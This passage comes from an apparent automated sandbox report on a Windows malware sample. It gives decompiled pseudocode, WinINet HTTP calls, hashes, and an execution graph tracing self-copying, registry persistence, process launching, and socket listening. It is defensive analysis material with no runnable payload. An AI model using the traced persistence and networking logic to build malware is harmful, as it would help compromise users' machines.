                                                                                                                                                                                                                                                                                    									if(_v36 != 0) {
                                                                                                                                                                                                                                                                                    										E0040B3E0( &_v16, "%S%S", _v32);
                                                                                                                                                                                                                                                                                    										_t90 = _t90 + 0x10;
                                                                                                                                                                                                                                                                                    										__imp__#6(_v36, _v36);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__imp__#6(_v32);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00408C70(_v12);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                                                                    0x0040cc36
                                                                                                                                                                                                                                                                                    0x0040cc45
                                                                                                                                                                                                                                                                                    0x0040cc4a
                                                                                                                                                                                                                                                                                    0x0040cc4d
                                                                                                                                                                                                                                                                                    0x0040cc54
                                                                                                                                                                                                                                                                                    0x0040cc5e
                                                                                                                                                                                                                                                                                    0x0040cc63
                                                                                                                                                                                                                                                                                    0x0040cc66
                                                                                                                                                                                                                                                                                    0x0040cc6d
                                                                                                                                                                                                                                                                                    0x0040cc73
                                                                                                                                                                                                                                                                                    0x0040cc7d
                                                                                                                                                                                                                                                                                    0x0040cc86
                                                                                                                                                                                                                                                                                    0x0040cc91
                                                                                                                                                                                                                                                                                    0x0040cca1
                                                                                                                                                                                                                                                                                    0x0040ccab
                                                                                                                                                                                                                                                                                    0x0040ccb4
                                                                                                                                                                                                                                                                                    0x0040ccbc
                                                                                                                                                                                                                                                                                    0x0040ccc8
                                                                                                                                                                                                                                                                                    0x0040cccd
                                                                                                                                                                                                                                                                                    0x0040ccd0
                                                                                                                                                                                                                                                                                    0x0040ccd7
                                                                                                                                                                                                                                                                                    0x0040ccdd
                                                                                                                                                                                                                                                                                    0x0040cce2
                                                                                                                                                                                                                                                                                    0x0040cce5
                                                                                                                                                                                                                                                                                    0x0040ccec
                                                                                                                                                                                                                                                                                    0x0040ccff
                                                                                                                                                                                                                                                                                    0x0040cd04
                                                                                                                                                                                                                                                                                    0x0040cd0b
                                                                                                                                                                                                                                                                                    0x0040cd0b
                                                                                                                                                                                                                                                                                    0x0040cd15
                                                                                                                                                                                                                                                                                    0x0040cd15
                                                                                                                                                                                                                                                                                    0x0040cd27
                                                                                                                                                                                                                                                                                    0x0040cd27
                                                                                                                                                                                                                                                                                    0x0040cd35
                                                                                                                                                                                                                                                                                    0x0040cd35
                                                                                                                                                                                                                                                                                    0x0040cd43
                                                                                                                                                                                                                                                                                    0x0040cd43
                                                                                                                                                                                                                                                                                    0x0040cd49
                                                                                                                                                                                                                                                                                    0x0040cd4e
                                                                                                                                                                                                                                                                                    0x0040cd57

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: memset.NTDLL ref: 0040C288
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetCrackUrlA.WININET(0040D079,00000000,10000000,0000003C), ref: 0040C2D8
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C2E8
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C321
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C357
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C37F
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C3C8
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C260: InternetCloseHandle.WININET(00000000), ref: 0040C457
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C000: SysAllocString.OLEAUT32(00000000), ref: 0040C02E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C000: CoCreateInstance.OLE32(00410318,00000000,00004401,00410308,00000000), ref: 0040C056
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040C000: SysFreeString.OLEAUT32(00000000), ref: 0040C0F1
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040CD0B
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040CD15
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                                                                                                                    • String ID: %S%S
                                                                                                                                                                                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                                                                                                                                                                                    • Opcode ID: 86f6504e5494efba9a820ad851abc2735c65b1deacf7d2d6193f3942743fcb34
                                                                                                                                                                                                                                                                                    • Instruction ID: f6c0dd48525cf9db1308fcfd74a329a1c42d5f2fc6292bf47869dbcd9c674937
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86f6504e5494efba9a820ad851abc2735c65b1deacf7d2d6193f3942743fcb34
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB4129B5E00109DFDB04DBE4D885AEFB7B9BF88304F104669E505B7390D738AA45CBA5
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                    Execution Coverage:0.2%
                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                                    Total number of Nodes:1437
                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:2
                                                                                                                                                                                                                                                                                    execution_graph 5264 40bec0 5267 40a210 5264->5267 5279 40a221 5267->5279 5269 40a23f 5271 408c70 _invalid_parameter 3 API calls 5269->5271 5272 40a5a4 5271->5272 5273 409f60 20 API calls 5273->5279 5275 409c60 28 API calls 5275->5279 5277 40a0b0 13 API calls 5277->5279 5279->5269 5279->5273 5279->5275 5279->5277 5281 40a130 5279->5281 5288 409cd0 EnterCriticalSection 5279->5288 5293 405820 5279->5293 5298 405860 5279->5298 5303 405730 5279->5303 5310 405790 5279->5310 5282 40a141 lstrlenA 5281->5282 5283 40ab80 7 API calls 5282->5283 5287 40a15f 5283->5287 5284 40a16b 5285 40a1ef 5284->5285 5286 408c70 _invalid_parameter 3 API calls 5284->5286 5285->5279 5286->5285 5287->5282 5287->5284 5289 409ce8 5288->5289 5290 409d24 LeaveCriticalSection 5289->5290 5313 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5289->5313 5290->5279 5292 409d13 5292->5290 5314 4057c0 5293->5314 5296 405859 5296->5279 5297 40bba0 17 API calls 5297->5296 5299 4057c0 65 API calls 5298->5299 5300 40587f 5299->5300 5302 4058ac 5300->5302 5324 4056e0 5300->5324 5302->5279 5335 4048b0 EnterCriticalSection 5303->5335 5305 40574a 5306 40577d 5305->5306 5340 405640 5305->5340 5306->5279 5309 408c70 _invalid_parameter 3 API calls 5309->5306 5347 404970 EnterCriticalSection 5310->5347 5312 4057b2 5312->5279 5313->5292 5317 4057d3 5314->5317 5315 405810 5315->5296 5315->5297 5317->5315 5318 4047c0 EnterCriticalSection 5317->5318 5319 40b210 63 API calls 5318->5319 5322 4047e0 5319->5322 5320 40488e LeaveCriticalSection 5320->5317 5321 408c70 _invalid_parameter 3 API calls 5323 40488b 5321->5323 5322->5320 5322->5321 5323->5320 5327 409ec0 5324->5327 5328 40a8f0 3 API calls 5327->5328 5329 409ecb 5328->5329 5330 409ee7 lstrlenA 5329->5330 5331 40ab80 7 API calls 5330->5331 5332 409f1d 5331->5332 5333 405725 5332->5333 5334 408c70 _invalid_parameter 3 API calls 5332->5334 5333->5302 5334->5333 5336 4048ce 5335->5336 5337 40495a LeaveCriticalSection 5336->5337 5338 408ce0 8 API calls 5336->5338 5337->5305 5339 40492c 5338->5339 5339->5337 5341 408b20 __aligned_recalloc_base 7 API calls 5340->5341 5342 405652 memcpy 5341->5342 5343 409ec0 13 API calls 5342->5343 5344 4056bc 5343->5344 5345 408c70 _invalid_parameter 3 API calls 5344->5345 5346 4056cb 5345->5346 5346->5309 5371 40b270 5347->5371 5350 404bae LeaveCriticalSection 5350->5312 5351 40b210 63 API calls 5352 4049ab 5351->5352 5352->5350 5355 408c70 _invalid_parameter 3 API calls 5352->5355 5370 404ac3 5352->5370 5353 404aec 5356 408c70 _invalid_parameter 3 API calls 5353->5356 5354 4044e0 68 API calls 5354->5353 5357 404a22 5355->5357 5358 404b0d 5356->5358 5359 408ce0 8 API calls 5357->5359 5358->5350 5360 404b1c CreateFileW 5358->5360 5361 404a32 5359->5361 5360->5350 5362 404b3f 5360->5362 5363 408c70 _invalid_parameter 3 API calls 5361->5363 5365 404b9a FlushFileBuffers CloseHandle 5362->5365 5366 404b5c WriteFile 5362->5366 5364 404a59 5363->5364 5367 40ab80 7 API calls 5364->5367 5365->5350 5366->5362 5368 404a90 5367->5368 5369 405c90 65 API calls 5368->5369 5369->5370 5370->5353 5370->5354 5374 40a7c0 5371->5374 5381 40a7d3 5374->5381 5375 408ce0 8 API calls 5375->5381 5376 40a7ed 5378 408c70 _invalid_parameter 3 API calls 5376->5378 5377 40a720 62 API calls 5377->5381 5379 404994 5378->5379 5379->5350 5379->5351 5380 4065e0 61 API calls 5380->5381 5381->5375 5381->5376 5381->5377 5381->5380 5589 40e400 GetTickCount WaitForSingleObject 5590 40e5a9 5589->5590 5591 40e42d WSAWaitForMultipleEvents 5589->5591 5592 40e4d0 GetTickCount 5591->5592 5593 40e44a WSAEnumNetworkEvents 5591->5593 5594 40e523 GetTickCount 5592->5594 5595 40e4e5 EnterCriticalSection 5592->5595 5593->5592 5605 40e463 5593->5605 5596 40e595 WaitForSingleObject 5594->5596 5597 40e52e EnterCriticalSection 5594->5597 5598 40e4f6 5595->5598 5599 40e51a LeaveCriticalSection 5595->5599 5596->5590 5596->5591 5601 40e581 LeaveCriticalSection GetTickCount 5597->5601 5602 40e53f InterlockedExchangeAdd 5597->5602 5603 40e509 LeaveCriticalSection 5598->5603 5639 40e300 5598->5639 5599->5596 5600 40e472 accept 5600->5592 5600->5605 5601->5596 5649 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5602->5649 5603->5596 5605->5592 5605->5600 5611 40df90 5605->5611 5631 40e7d0 5605->5631 5608 40e552 5608->5601 5608->5602 5650 409600 shutdown closesocket 5608->5650 5612 40dfa2 EnterCriticalSection 5611->5612 5613 40df9d 5611->5613 5614 40dfb7 5612->5614 5615 40dfcd LeaveCriticalSection 5612->5615 5613->5605 5614->5615 5616 40dfd8 5615->5616 5617 40dfdf 5615->5617 5616->5605 5618 408b00 7 API calls 5617->5618 5619 40dfe9 5618->5619 5620 40dff6 getpeername CreateIoCompletionPort 5619->5620 5621 40e088 5619->5621 5622 40e082 5620->5622 5623 40e036 5620->5623 5653 409600 shutdown closesocket 5621->5653 5627 408c70 _invalid_parameter 3 API calls 5622->5627 5651 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 5623->5651 5625 40e093 5625->5605 5627->5621 5628 40e03b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5652 40deb0 EnterCriticalSection LeaveCriticalSection 5628->5652 5630 40e07b 5630->5605 5632 40e7e0 InterlockedExchangeAdd 5631->5632 5633 40e7dc 5631->5633 5634 40e833 5632->5634 5635 40e7f7 InterlockedIncrement 5632->5635 5633->5592 5634->5592 5654 40e730 WSARecv 5635->5654 5637 40e826 5637->5634 5638 40e82c InterlockedDecrement 5637->5638 5638->5634 5640 40e310 5639->5640 5648 40e3e1 5639->5648 5641 40e31d InterlockedExchangeAdd 5640->5641 5640->5648 5647 40e334 5641->5647 5641->5648 5642 40e360 5643 40e371 5642->5643 5669 409600 shutdown closesocket 5642->5669 5646 40e387 InterlockedDecrement 5643->5646 5643->5648 5646->5648 5647->5642 5647->5648 5660 40e280 EnterCriticalSection 5647->5660 5648->5599 5649->5608 5650->5608 5651->5628 5652->5630 5653->5625 5655 40e7b2 5654->5655 5656 40e76e 5654->5656 5655->5637 5657 40e770 WSAGetLastError 5656->5657 5658 40e784 Sleep WSARecv 5656->5658 5659 40e7bb 5656->5659 5657->5655 5657->5656 5658->5655 5658->5657 5659->5637 5661 40e2e7 LeaveCriticalSection 5660->5661 5662 40e29a InterlockedExchangeAdd 5660->5662 5661->5647 5663 40e2aa LeaveCriticalSection 5662->5663 5664 40e2b9 5662->5664 5663->5647 5665 408c70 _invalid_parameter 3 API calls 5664->5665 5666 40e2de 5665->5666 5667 408c70 _invalid_parameter 3 API calls 5666->5667 5668 40e2e4 5667->5668 5668->5661 5669->5643 5670 404880 5672 40481b 5670->5672 5671 408c70 _invalid_parameter 3 API calls 5673 40488b LeaveCriticalSection 5671->5673 5672->5671 5382 40c741 5383 40c74a 5382->5383 5384 40c83d 5383->5384 5385 40c7b3 lstrcmpiW 5383->5385 5386 40c833 SysFreeString 5385->5386 5387 40c7c6 5385->5387 5386->5384 5388 40c200 2 API calls 5387->5388 5390 40c7d4 5388->5390 5389 40c825 5389->5386 5390->5386 5390->5389 5391 40c803 lstrcmpiW 5390->5391 5392 40c815 5391->5392 5393 40c81b SysFreeString 5391->5393 5392->5393 5393->5389 5394 404acc 5395 4049cc 5394->5395 5396 404ac3 5395->5396 5398 408c70 _invalid_parameter 3 API calls 5395->5398 5397 4044e0 68 API calls 5396->5397 5400 404aec 5396->5400 5397->5400 5401 404a22 5398->5401 5399 408c70 _invalid_parameter 3 API calls 5402 404b0d 5399->5402 5400->5399 5403 408ce0 8 API calls 5401->5403 5404 404b1c CreateFileW 5402->5404 5405 404bae LeaveCriticalSection 5402->5405 5406 404a32 5403->5406 5404->5405 5407 404b3f 5404->5407 5408 408c70 _invalid_parameter 3 API calls 5406->5408 5410 404b9a FlushFileBuffers CloseHandle 5407->5410 5411 404b5c WriteFile 5407->5411 5409 404a59 5408->5409 5412 40ab80 7 API calls 5409->5412 5410->5405 5411->5407 5413 404a90 5412->5413 5414 405c90 65 API calls 5413->5414 5414->5396 5415 408d4e 5416 408c70 _invalid_parameter 3 API calls 5415->5416 5419 408d0d 5416->5419 5417 408d22 5418 408b20 __aligned_recalloc_base 7 API calls 5418->5419 5419->5417 5419->5418 5420 408d24 memcpy 5419->5420 5420->5419 4311 405e10 Sleep 4315 405e38 4311->4315 4312 405e46 PathFileExistsW 4314 405e55 CopyFileW MoveFileA MoveFileW 4312->4314 4312->4315 4313 405e98 CreateMutexA GetLastError 4316 405ec2 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 4313->4316 4317 405eba ExitProcess 4313->4317 4314->4315 4315->4312 4315->4313 4318 405f4d 4316->4318 4319 40623a Sleep RegOpenKeyExA 4318->4319 4366 40d0f0 GetLocaleInfoA 4318->4366 4320 406351 RegOpenKeyExA 4319->4320 4321 40626b 8 API calls 4319->4321 4323 406377 8 API calls 4320->4323 4324 40645d Sleep 4320->4324 4321->4320 4323->4324 4373 40b1c0 4324->4373 4327 405fe4 ExitProcess 4328 405fec ExpandEnvironmentStringsW wsprintfW CopyFileW 4329 406040 SetFileAttributesW RegOpenKeyExW 4328->4329 4330 406119 Sleep wsprintfW CopyFileW 4328->4330 4332 406075 RegSetValueExW RegCloseKey 4329->4332 4333 4060fa 4329->4333 4330->4319 4335 406161 SetFileAttributesW RegOpenKeyExW 4330->4335 4332->4333 4368 40d390 memset CreateProcessW 4333->4368 4334 406478 9 API calls 4376 4045f0 InitializeCriticalSection CreateFileW 4334->4376 5159 4043f0 4334->5159 5168 4054a0 Sleep GetModuleFileNameW 4334->5168 5182 405cf0 4334->5182 4338 406196 RegSetValueExW RegCloseKey 4335->4338 4339 40621b 4335->4339 4338->4339 4344 40d390 5 API calls 4339->4344 4340 4065c5 4345 406227 4344->4345 4345->4319 4349 406232 ExitProcess 4345->4349 4346 406111 ExitProcess 4352 40652d CreateEventA 4408 40a8f0 4352->4408 4361 40bba0 17 API calls 4362 40658d 4361->4362 4363 40bba0 17 API calls 4362->4363 4364 4065a9 4363->4364 4365 40bba0 17 API calls 4364->4365 4365->4340 4367 405fdc 4366->4367 4367->4327 4367->4328 4369 40d3f0 Sleep 4368->4369 4370 40d3ff ShellExecuteW 4368->4370 4371 406106 4369->4371 4370->4371 4372 40d425 Sleep 4370->4372 4371->4330 4371->4346 4372->4371 4453 40b190 4373->4453 4377 404715 4376->4377 4378 404628 CreateFileMappingW 4376->4378 4390 40d020 CoInitializeEx 4377->4390 4379 404649 MapViewOfFile 4378->4379 4380 40470b CloseHandle 4378->4380 4381 404701 CloseHandle 4379->4381 4382 404668 GetFileSize 4379->4382 4380->4377 4381->4380 4384 40467d 4382->4384 4383 4046f7 UnmapViewOfFile 4383->4381 4384->4383 4386 4046bc 4384->4386 4389 40468c 4384->4389 4582 40b210 4384->4582 4589 4044e0 4384->4589 4387 408c70 _invalid_parameter 3 API calls 4386->4387 4387->4389 4389->4383 4889 40c580 socket 4390->4889 4392 40d0c8 4933 408d90 4392->4933 4395 40d040 4395->4392 4396 406528 4395->4396 4397 40d08a 4395->4397 4899 40cc30 4395->4899 4403 405ba0 CoInitializeEx SysAllocString 4396->4403 4914 409540 htons 4397->4914 4402 40cfa0 24 API calls 4402->4392 4404 405bc2 4403->4404 4405 405bd8 CoUninitialize 4403->4405 5078 405910 4404->5078 4405->4352 5087 40a8b0 4408->5087 4411 40a8b0 3 API calls 4412 40a90e 4411->4412 4413 40a8b0 3 API calls 4412->4413 4414 40a91e 4413->4414 4415 40a8b0 3 API calls 4414->4415 4416 406545 4415->4416 4417 40baf0 4416->4417 4418 408b00 7 API calls 4417->4418 4419 40bafb 4418->4419 4420 40654f 4419->4420 4421 40bb07 InitializeCriticalSection 4419->4421 4422 409d40 InitializeCriticalSection 4420->4422 4421->4420 4435 409d5a 4422->4435 4423 409d89 CreateFileW 4424 409db0 CreateFileMappingW 4423->4424 4425 409e72 4423->4425 4427 409dd1 MapViewOfFile 4424->4427 4428 409e68 CloseHandle 4424->4428 5131 409750 EnterCriticalSection 4425->5131 4431 409dec GetFileSize 4427->4431 4432 409e5e CloseHandle 4427->4432 4428->4425 4430 409e77 4434 40bba0 17 API calls 4430->4434 4439 409e0b 4431->4439 4432->4428 4436 406559 4434->4436 4435->4423 5094 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 4435->5094 5095 409a30 4435->5095 4441 40bba0 4436->4441 4437 409e54 UnmapViewOfFile 4437->4432 4439->4437 4440 409a30 28 API calls 4439->4440 5130 40be60 NtQuerySystemTime RtlTimeToSecondsSince1980 4439->5130 4440->4439 4442 40bbb7 EnterCriticalSection 4441->4442 4443 406572 4441->4443 5154 40bb20 4442->5154 4443->4361 4446 40bc7b LeaveCriticalSection 4446->4443 4447 408b60 9 API calls 4448 40bbf9 4447->4448 4448->4446 4449 40bc0b CreateThread 4448->4449 4449->4446 4450 40bc2e 4449->4450 4451 40bc52 GetCurrentProcess GetCurrentProcess DuplicateHandle 4450->4451 4452 40bc74 4450->4452 4451->4452 4452->4446 4456 40b130 4453->4456 4457 40b163 4456->4457 4458 40b14e 4456->4458 4461 40646d 4457->4461 4488 40af60 4457->4488 4462 40ade0 4458->4462 4461->4334 4461->4340 4463 40ae92 4462->4463 4464 40ae09 4462->4464 4466 408b00 7 API calls 4463->4466 4487 40ae8a 4463->4487 4464->4487 4522 408b00 4464->4522 4468 40aeb8 4466->4468 4470 401000 7 API calls 4468->4470 4468->4487 4472 40aee5 4470->4472 4474 4011e0 10 API calls 4472->4474 4476 40aeff 4474->4476 4475 40ae5f 4477 401000 7 API calls 4475->4477 4478 401000 7 API calls 4476->4478 4479 40ae70 4477->4479 4480 40af10 4478->4480 4481 4011e0 10 API calls 4479->4481 4482 4011e0 10 API calls 4480->4482 4481->4487 4483 40af2a 4482->4483 4484 401000 7 API calls 4483->4484 4485 40af3b 4484->4485 4486 4011e0 10 API calls 4485->4486 4486->4487 4487->4461 4489 40af89 4488->4489 4492 40b03a 4488->4492 4490 40b032 4489->4490 4491 408b00 7 API calls 4489->4491 4490->4461 4493 40af9f 4491->4493 4492->4490 4494 408b00 7 API calls 4492->4494 4493->4490 4496 401000 7 API calls 4493->4496 4495 40b05e 4494->4495 4495->4490 4498 401000 7 API calls 4495->4498 4497 40afc3 4496->4497 4499 408b00 7 API calls 4497->4499 4500 40b082 4498->4500 4502 40afd2 4499->4502 4501 408b00 7 API calls 4500->4501 4503 40b091 4501->4503 4504 4011e0 10 API calls 4502->4504 4506 4011e0 10 API calls 4503->4506 4505 40affb 4504->4505 4507 408c70 _invalid_parameter 3 API calls 4505->4507 4508 40b0ba 4506->4508 4509 40b007 4507->4509 4510 408c70 _invalid_parameter 3 API calls 4508->4510 4511 401000 7 API calls 4509->4511 4512 40b0c6 4510->4512 4513 40b018 4511->4513 4514 401000 7 API calls 4512->4514 4515 4011e0 10 API calls 4513->4515 4516 40b0d7 4514->4516 4515->4490 4517 4011e0 10 API calls 4516->4517 4518 40b0f1 4517->4518 4519 401000 7 API calls 4518->4519 4520 40b102 4519->4520 4521 4011e0 10 API calls 4520->4521 4521->4490 4533 408a60 4522->4533 4525 401000 4554 408b20 4525->4554 4530 4011e0 4561 4010c0 4530->4561 4532 4011ff _invalid_parameter 4532->4475 4542 408850 GetCurrentProcessId 4533->4542 4535 408a6b 4536 408a77 __aligned_recalloc_base 4535->4536 4543 4089c0 4535->4543 4538 408aec 4536->4538 4539 408a92 HeapAlloc 4536->4539 4538->4487 4538->4525 4539->4538 4540 408ab9 __aligned_recalloc_base 4539->4540 4540->4538 4541 408ad4 memset 4540->4541 4541->4538 4542->4535 4551 408850 GetCurrentProcessId 4543->4551 4545 4089c9 4546 4089e6 HeapCreate 4545->4546 4552 408930 GetProcessHeaps 4545->4552 4548 408a00 HeapSetInformation GetCurrentProcessId 4546->4548 4549 408a27 4546->4549 4548->4549 4549->4536 4551->4545 4553 408961 4552->4553 4553->4546 4553->4549 4555 408a60 __aligned_recalloc_base 7 API calls 4554->4555 4556 40100b 4555->4556 4557 401400 4556->4557 4558 40140a 4557->4558 4559 408b20 __aligned_recalloc_base 7 API calls 4558->4559 4560 401018 4559->4560 4560->4530 4562 40110e 4561->4562 4564 4010d1 4561->4564 4563 408b20 __aligned_recalloc_base 7 API calls 4562->4563 4562->4564 4567 401132 _invalid_parameter 4563->4567 4564->4532 4565 401162 memcpy 4566 401186 _invalid_parameter 4565->4566 4569 408c70 _invalid_parameter 3 API calls 4566->4569 4567->4565 4571 408c70 4567->4571 4569->4564 4578 408850 GetCurrentProcessId 4571->4578 4573 408c7b 4574 40115f 4573->4574 4579 408870 4573->4579 4574->4565 4577 408c97 HeapFree 4577->4574 4578->4573 4580 4088a0 HeapValidate 4579->4580 4581 4088c0 4579->4581 4580->4581 4581->4574 4581->4577 4598 408ce0 4582->4598 4585 40b251 4585->4384 4588 408c70 _invalid_parameter 3 API calls 4588->4585 4806 408b60 4589->4806 4592 408ce0 8 API calls 4593 40454b 4592->4593 4816 40ab80 4593->4816 4595 4045d1 4595->4384 4599 408d0d 4598->4599 4600 408b20 __aligned_recalloc_base 7 API calls 4599->4600 4601 408d22 4599->4601 4602 408d24 memcpy 4599->4602 4600->4599 4601->4585 4603 40a720 4601->4603 4602->4599 4605 40a72c 4603->4605 4607 40a788 4605->4607 4609 408c70 _invalid_parameter 3 API calls 4605->4609 4610 40a74b 4605->4610 4611 40ac70 4605->4611 4625 4065e0 4605->4625 4608 408c70 _invalid_parameter 3 API calls 4607->4608 4608->4610 4609->4605 4610->4585 4610->4588 4612 40ac7f __aligned_recalloc_base 4611->4612 4613 408b20 __aligned_recalloc_base 7 API calls 4612->4613 4615 40ac89 4612->4615 4614 40ad18 4613->4614 4614->4615 4616 401000 7 API calls 4614->4616 4615->4605 4617 40ad2d 4616->4617 4618 401000 7 API calls 4617->4618 4619 40ad35 4618->4619 4621 40ad8d __aligned_recalloc_base 4619->4621 4628 40ac10 4619->4628 4633 401050 4621->4633 4624 401050 3 API calls 4624->4615 4741 4087d0 4625->4741 4629 4011e0 10 API calls 4628->4629 4630 40ac24 4629->4630 4639 4013e0 4630->4639 4632 40ac3c 4632->4619 4634 4010ae 4633->4634 4637 401064 _invalid_parameter 4633->4637 4634->4624 4635 40108c 4636 408c70 _invalid_parameter 3 API calls 4635->4636 4636->4634 4637->4635 4638 408c70 _invalid_parameter 3 API calls 4637->4638 4638->4635 4642 4012d0 4639->4642 4641 4013fa 4641->4632 4643 4012e4 4642->4643 4644 4010c0 __aligned_recalloc_base 10 API calls 4643->4644 4645 40132d 4644->4645 4646 4010c0 __aligned_recalloc_base 10 API calls 4645->4646 4647 40133d 4646->4647 4648 4010c0 __aligned_recalloc_base 10 API calls 4647->4648 4649 40134d 4648->4649 4650 4010c0 __aligned_recalloc_base 10 API calls 4649->4650 4651 40135d 4650->4651 4652 401366 4651->4652 4653 40138f 4651->4653 4657 402c20 4652->4657 4674 4029d0 4653->4674 4656 401387 _invalid_parameter 4656->4641 4658 401400 _invalid_parameter 7 API calls 4657->4658 4659 402c37 4658->4659 4660 401400 _invalid_parameter 7 API calls 4659->4660 4661 402c46 4660->4661 4662 401400 _invalid_parameter 7 API calls 4661->4662 4663 402c55 4662->4663 4664 401400 _invalid_parameter 7 API calls 4663->4664 4673 402c64 _invalid_parameter 4664->4673 4666 402e0f _invalid_parameter 4667 401430 _invalid_parameter 3 API calls 4666->4667 4668 402e35 _invalid_parameter 4666->4668 4667->4666 4669 401430 _invalid_parameter 3 API calls 4668->4669 4670 402e5b _invalid_parameter 4668->4670 4669->4668 4671 401430 _invalid_parameter 3 API calls 4670->4671 4672 402e81 4670->4672 4671->4670 4672->4656 4673->4666 4677 401430 4673->4677 4681 402e90 4674->4681 4676 4029ec 4676->4656 4678 401446 4677->4678 4679 40143b 4677->4679 4678->4673 4680 408c70 _invalid_parameter 3 API calls 4679->4680 4680->4678 4682 402ea6 _invalid_parameter 4681->4682 4683 402eb8 _invalid_parameter 4682->4683 4684 402edd 4682->4684 4688 402f03 4682->4688 4683->4676 4711 402880 4684->4711 4686 402f3d 4721 402a00 4686->4721 4687 402f5e 4690 401400 _invalid_parameter 7 API calls 4687->4690 4688->4686 4688->4687 4691 402f6f 4690->4691 4692 401400 _invalid_parameter 7 API calls 4691->4692 4693 402f7e 4692->4693 4694 401400 _invalid_parameter 7 API calls 4693->4694 4695 402f8d 4694->4695 4696 401400 _invalid_parameter 7 API calls 4695->4696 4697 402f9c 4696->4697 4734 402950 4697->4734 4699 401400 _invalid_parameter 7 API calls 4700 402fca _invalid_parameter 4699->4700 4700->4699 4701 403084 _invalid_parameter 4700->4701 4702 401430 _invalid_parameter 3 API calls 4701->4702 4703 4033a3 _invalid_parameter 4701->4703 4702->4701 4704 401430 _invalid_parameter 3 API calls 4703->4704 4705 4033c9 _invalid_parameter 4703->4705 4704->4703 4706 401430 _invalid_parameter 3 API calls 4705->4706 4707 4033ef _invalid_parameter 4705->4707 4706->4705 4708 401430 _invalid_parameter 3 API calls 4707->4708 4709 403415 _invalid_parameter 4707->4709 4708->4707 4709->4683 4710 401430 _invalid_parameter 3 API calls 4709->4710 4710->4709 4712 40288e 4711->4712 4713 401400 _invalid_parameter 7 API calls 4712->4713 4714 4028ab 4713->4714 4715 401400 _invalid_parameter 7 API calls 4714->4715 4716 4028ba _invalid_parameter 4715->4716 4717 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4716->4717 4718 40291a _invalid_parameter 4716->4718 4717->4716 4719 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4718->4719 4720 402940 4718->4720 4719->4718 4720->4683 4722 401400 _invalid_parameter 7 API calls 4721->4722 4723 402a17 4722->4723 4724 401400 _invalid_parameter 7 API calls 4723->4724 4725 402a26 4724->4725 4726 401400 _invalid_parameter 